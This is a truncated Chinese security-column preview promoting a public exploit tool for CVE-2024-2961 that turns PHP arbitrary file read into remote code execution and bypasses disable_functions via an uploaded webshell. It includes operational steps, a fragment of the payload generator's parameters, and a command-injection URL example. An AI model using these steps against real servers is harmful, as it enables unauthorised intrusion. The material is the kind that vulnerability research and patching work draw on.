专栏名称: 哈拉少安全小队
专注安全研究,漏洞复现,代码审计,python poc/exp脚本开发,经常更新一些最新的漏洞复现,漏洞分析文章,以及脱敏的实战文章。
今天看啥  ›  专栏  ›  哈拉少安全小队

github公开php-filter-iconv,Urldns项目更新

哈拉少安全小队  · 公众号  ·  · 2024-08-21 09:21

文章预览

https://github.com/kezibei/php-filter-iconv 这个项目可以利用CVE-2024-2961打php,将任意文件读取转化成RCE。或者已经拿到webshell的情况下,利用CVE-2024-2961 bypass disable_functions。 php-filter-iconv.py用法 先通过任意文件下载漏洞获取目标的/proc/self/maps和libc-2.x.so,在本机和php-filter-iconv.py放在同目录,然后运行脚本即可生成php://filter/的RCE payload,详细参数调整如下代码即可。 ....... maps_path = './maps' cmd = 'echo 123 > 1.txt' sleep_time = 1 padding = 20 if not os.path.exists(maps_path): exit( "[-]no maps file" ) regions = get_regions(maps_path) heap, libc_info = get_symbols_and_addresses(regions) libc_path = libc_info.path print("[*]download: "+libc_path) libc_path = './libc-2.23.so' ....... php-filter-iconv.php用法 直接上传到已经获得webshell的服务器进行bypass disable_functions,然后访问如下链接检测环境。 /php-filter-iconv.php?cmd=curl 127.0.0.1:8888 =0 然 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览